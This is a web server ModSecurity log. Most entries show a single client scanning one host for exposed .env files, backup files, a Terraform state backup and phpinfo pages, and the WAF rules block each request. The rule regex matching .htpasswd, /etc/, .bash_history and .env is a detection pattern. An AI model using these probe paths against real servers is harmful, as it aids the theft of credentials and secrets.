[Tue May 26 13:17:31.434896 2026] [security2:error] [pid 501489:tid 501700] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/node/api/.env"] [unique_id "ahVQE2kFNZ9cRlz80IjSPQAAANU"]
[Tue May 26 13:17:31.437396 2026] [security2:error] [pid 501489:tid 501624] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/node/.env"] [unique_id "ahVQE2kFNZ9cRlz80IjSPgAAAIo"]
[Tue May 26 13:17:31.440697 2026] [security2:error] [pid 501489:tid 501750] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/node/backend/.env"] [unique_id "ahVQE2kFNZ9cRlz80IjSPwAAAQM"]
[Tue May 26 13:17:31.463462 2026] [security2:error] [pid 501489:tid 501634] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/nodeapi/.env"] [unique_id "ahVQE2kFNZ9cRlz80IjSQAAAAJQ"]
[Tue May 26 13:17:31.475213 2026] [security2:error] [pid 501489:tid 501669] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/nodeweb/.env"] [unique_id "ahVQE2kFNZ9cRlz80IjSQQAAALY"]
[Tue May 26 13:17:31.525747 2026] [security2:error] [pid 501489:tid 501654] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/media/.env"] [unique_id "ahVQE2kFNZ9cRlz80IjSSAAAAKc"]
[Tue May 26 13:17:31.538823 2026] [security2:error] [pid 501489:tid 501649] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/old/.env"] [unique_id "ahVQE2kFNZ9cRlz80IjSSQAAAKI"]
[Tue May 26 13:17:31.713136 2026] [security2:error] [pid 501489:tid 501742] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/opt/.env"] [unique_id "ahVQE2kFNZ9cRlz80IjSYwAAAPs"]
[Tue May 26 13:17:31.769449 2026] [security2:error] [pid 501489:tid 501666] [client 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/php-info.php"] [unique_id "ahVQE2kFNZ9cRlz80IjSaAAAALM"]
[Tue May 26 13:17:31.781574 2026] [security2:error] [pid 501489:tid 501728] [client 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/php.php"] [unique_id "ahVQE2kFNZ9cRlz80IjSaQAAAO8"]
[Tue May 26 13:17:31.793504 2026] [security2:error] [pid 501489:tid 501647] [client 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/php_info.php"] [unique_id "ahVQE2kFNZ9cRlz80IjSagAAAKA"]
[Tue May 26 13:17:31.806602 2026] [security2:error] [pid 501489:tid 501735] [client 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/phpinfo.php"] [unique_id "ahVQE2kFNZ9cRlz80IjSbAAAAPU"]
[Tue May 26 13:17:31.836050 2026] [security2:error] [pid 501489:tid 501701] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/portal/.env"] [unique_id "ahVQE2kFNZ9cRlz80IjSbgAAANY"]
[Tue May 26 13:17:31.871930 2026] [security2:error] [pid 501489:tid 501709] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/prod/.env"] [unique_id "ahVQE2kFNZ9cRlz80IjScQAAAN4"]
[Tue May 26 13:17:31.875437 2026] [security2:error] [pid 501489:tid 501632] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/product/.env"] [unique_id "ahVQE2kFNZ9cRlz80IjScgAAAJI"]
[Tue May 26 13:17:31.885694 2026] [security2:error] [pid 501489:tid 501733] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/production/.env"] [unique_id "ahVQE2kFNZ9cRlz80IjScwAAAPM"]
[Tue May 26 13:17:31.940182 2026] [security2:error] [pid 501489:tid 501650] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/public-api/.env"] [unique_id "ahVQE2kFNZ9cRlz80IjSeQAAAKM"]
[Tue May 26 13:17:31.996229 2026] [security2:error] [pid 501489:tid 501713] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/public_html/.env"] [unique_id "ahVQE2kFNZ9cRlz80IjSgAAAAOI"]
[Tue May 26 13:17:32.010733 2026] [security2:error] [pid 501489:tid 501640] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/qa/.env"] [unique_id "ahVQFGkFNZ9cRlz80IjSgQAAAJo"]
[Tue May 26 13:17:32.072978 2026] [security2:error] [pid 501489:tid 501679] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/project/.env"] [unique_id "ahVQFGkFNZ9cRlz80IjShwAAAMA"]
[Tue May 26 13:17:32.102389 2026] [security2:error] [pid 501489:tid 501716] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/public/.env"] [unique_id "ahVQFGkFNZ9cRlz80IjSigAAAOU"]
[Tue May 26 13:17:32.122343 2026] [security2:error] [pid 501489:tid 501620] [client 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/public/phpinfo.php"] [unique_id "ahVQFGkFNZ9cRlz80IjSjQAAAIY"]
[Tue May 26 13:17:32.419505 2026] [security2:error] [pid 501489:tid 501658] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/s3/.env.bak"] [unique_id "ahVQFGkFNZ9cRlz80IjSrAAAAKs"]
[Tue May 26 13:17:32.528241 2026] [security2:error] [pid 501489:tid 501701] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/server/.env"] [unique_id "ahVQFGkFNZ9cRlz80IjStgAAANY"]
[Tue May 26 13:17:32.536765 2026] [security2:error] [pid 501489:tid 501699] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/server/api/.env"] [unique_id "ahVQFGkFNZ9cRlz80IjStwAAANQ"]
[Tue May 26 13:17:32.568211 2026] [security2:error] [pid 501489:tid 501632] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/server/backend/.env"] [unique_id "ahVQFGkFNZ9cRlz80IjSuQAAAJI"]
[Tue May 26 13:17:33.047109 2026] [security2:error] [pid 501489:tid 501734] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQFGkFNZ9cRlz80IjSwgAAAPQ"]
[Tue May 26 13:17:33.812402 2026] [security2:error] [pid 501489:tid 501698] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/shared/.env"] [unique_id "ahVQFWkFNZ9cRlz80IjS6QAAANM"]
[Tue May 26 13:17:33.815830 2026] [security2:error] [pid 501489:tid 501660] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/shop/.env"] [unique_id "ahVQFWkFNZ9cRlz80IjS6gAAAK0"]
[Tue May 26 13:17:33.836159 2026] [security2:error] [pid 501489:tid 501648] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/service/.env"] [unique_id "ahVQFWkFNZ9cRlz80IjS7gAAAKE"]
[Tue May 26 13:17:33.849428 2026] [security2:error] [pid 501489:tid 501627] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/services/.env"] [unique_id "ahVQFWkFNZ9cRlz80IjS8AAAAI0"]
[Tue May 26 13:17:33.975592 2026] [security2:error] [pid 501489:tid 501665] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/src/.env"] [unique_id "ahVQFWkFNZ9cRlz80IjS-wAAALI"]
[Tue May 26 13:17:34.102963 2026] [security2:error] [pid 501489:tid 501749] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/srv/.env"] [unique_id "ahVQFmkFNZ9cRlz80IjS_wAAAQI"]
[Tue May 26 13:17:34.111853 2026] [security2:error] [pid 501489:tid 501649] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/stage/.env"] [unique_id "ahVQFmkFNZ9cRlz80IjTAAAAAKI"]
[Tue May 26 13:17:34.131502 2026] [security2:error] [pid 501489:tid 501696] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/staging/.env"] [unique_id "ahVQFmkFNZ9cRlz80IjTAQAAANE"]
[Tue May 26 13:17:34.202364 2026] [security2:error] [pid 501489:tid 501707] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/stg/.env"] [unique_id "ahVQFmkFNZ9cRlz80IjTDQAAANw"]
[Tue May 26 13:17:34.335114 2026] [security2:error] [pid 501489:tid 501694] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/stripe/.env"] [unique_id "ahVQFmkFNZ9cRlz80IjTHwAAAM8"]
[Tue May 26 13:17:34.437767 2026] [security2:error] [pid 501489:tid 501743] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/terraform.tfstate.backup"] [unique_id "ahVQFmkFNZ9cRlz80IjTKQAAAPw"]
[Tue May 26 13:17:34.484072 2026] [security2:error] [pid 501489:tid 501737] [client 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/test.php"] [unique_id "ahVQFmkFNZ9cRlz80IjTLgAAAPY"]
[Tue May 26 13:17:34.493609 2026] [security2:error] [pid 501489:tid 501642] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/test/.env"] [unique_id "ahVQFmkFNZ9cRlz80IjTLwAAAJw"]
